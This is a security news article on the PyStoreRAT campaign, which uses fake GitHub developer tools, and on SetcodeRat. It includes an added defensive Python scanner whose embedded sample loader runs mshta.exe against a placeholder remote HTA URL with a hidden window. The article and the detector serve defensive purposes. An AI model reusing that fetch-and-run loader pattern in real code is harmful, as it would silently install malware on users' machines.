
GitHub Hosts New PyStoreRAT Malware Targeting Developers

New PyStoreRAT Malware Campaign Exploits GitHub Repositories to Distribute Modular JavaScript RAT Targeting OSINT and Development Tools

  • A new malware campaign uses GitHub-hosted Python repositories to distribute a JavaScript Remote Access Trojan called PyStoreRAT.
  • PyStoreRAT is modular with multi-stage capabilities and delivers an information stealer named Rhadamanthys as a secondary payload.
  • The malware deploys through fake OSINT and development tools, exploiting GitHub trust and social media promotion to attract users.
  • PyStoreRAT gathers system data, monitors antivirus products, and persists via scheduled tasks disguised as legitimate updates.
  • Another distinct RAT, SetcodeRat, targets Chinese-speaking users, gating execution on region and language checks, and spreads via fake installers.

Cybersecurity researchers have uncovered a new malware campaign that distributes a previously undocumented JavaScript-based Remote Access Trojan (RAT), named PyStoreRAT, through GitHub-hosted Python repositories. The campaign emerged in mid-June 2025 and abuses repositories disguised as OSINT utilities, DeFi bots, GPT wrappers, and other tools designed to appeal to developers and analysts. According to researcher Yonatan Edri, these repositories contain minimal code that silently downloads and executes a remote HTA file using “mshta.exe,” triggering the malware infection.
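For defenders reviewing a cloned repository before running it, the loader pattern described above (Python code that launches "mshta.exe" against a remote HTA) can be triaged statically. The following is an added example, not code from the researchers or the campaign; the function names, the sample strings, and the placeholder URL are constructed for illustration.

```python
import ast
import re

MSHTA_RE = re.compile(r"\bmshta(\.exe)?\b", re.IGNORECASE)
URL_RE = re.compile(r"https?://[^\s'\"]+", re.IGNORECASE)
# Call names that start a process; matched on the trailing attribute only.
EXEC_CALLS = {"system", "popen", "Popen", "run", "call", "check_call",
              "check_output", "startfile"}

# Constructed samples (placeholder URL), not taken from the campaign.
SAMPLE_LOADER = '''
import subprocess
def check_updates():
    subprocess.Popen(["mshta.exe", "https://example.invalid/update.hta"],
                     creationflags=0x08000000)
'''
SAMPLE_BENIGN = '''
import subprocess
subprocess.run(["git", "status"], check=True)
'''


def _call_name(node):
    """Trailing name of a call target, e.g. 'run' for subprocess.run."""
    func = node.func
    if isinstance(func, ast.Attribute):
        return func.attr
    return func.id if isinstance(func, ast.Name) else ""


def scan_source(source, filename="<memory>"):
    """Flag process-launch calls whose literal arguments mention mshta."""
    # Heuristic triage only: commands built at runtime or obfuscated evade it.
    findings = []
    try:
        tree = ast.parse(source, filename=filename)
    except SyntaxError:
        return findings  # not valid Python 3; review the file by hand
    for node in ast.walk(tree):
        if not isinstance(node, ast.Call) or _call_name(node) not in EXEC_CALLS:
            continue
        args = list(node.args) + [kw.value for kw in node.keywords]
        text = " ".join(c.value for a in args for c in ast.walk(a)
                        if isinstance(c, ast.Constant) and isinstance(c.value, str))
        if MSHTA_RE.search(text):
            findings.append({"file": filename, "line": node.lineno,
                             "call": _call_name(node), "urls": URL_RE.findall(text)})
    return findings
```

To cover a whole checkout, pass the text of each `.py` file to `scan_source` and review every finding by hand; an empty result does not clear a repository.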


PyStoreRAT operates as a modular, multi-stage implant able to run various payload formats, including EXE, DLL, PowerShell, MSI, Python, JavaScript, and HTA modules. Its infection chain culminates in deploying the Rhadamanthys information stealer. The attackers boost the repositories’ visibility on GitHub’s trending lists by inflating star and fork numbers and promote them through social media platforms like YouTube and X. The malware authors often introduce malicious payloads disguised as “maintenance” commits after the tools gain popularity.

Once executed, the malware profiles the system, checks for administrator privileges, and scans for cryptocurrency wallet files linked to platforms such as Ledger Live, Trezor, Exodus, Atomic, Guarda, and BitBox02. It performs antivirus checks looking for products like CrowdStrike Falcon and Cybereason to evade detection. Persistence is maintained by creating a scheduled task disguised as an NVIDIA app self-update. The implant communicates with an external server to receive commands, including downloading and running various payload types, executing PowerShell commands in memory, spreading via removable drives by replacing files with malicious shortcuts, and deleting its task to erase forensic traces.

Separate from PyStoreRAT, a new RAT called SetcodeRat has been identified targeting Chinese-speaking regions since October 2025. The malware disguises itself as legitimate installers for popular software and only proceeds if the victim’s system language matches Mainland China, Hong Kong, Macao, or Taiwan, exiting otherwise. It also requires a successful connection to a specific Bilibili URL before continuing. The payload includes a DLL that executes the RAT, which connects via Telegram or a command-and-control server to gather system data, capture screenshots, log keystrokes, run processes, and update itself. Details were shared by QiAnXin Threat Intelligence Center.
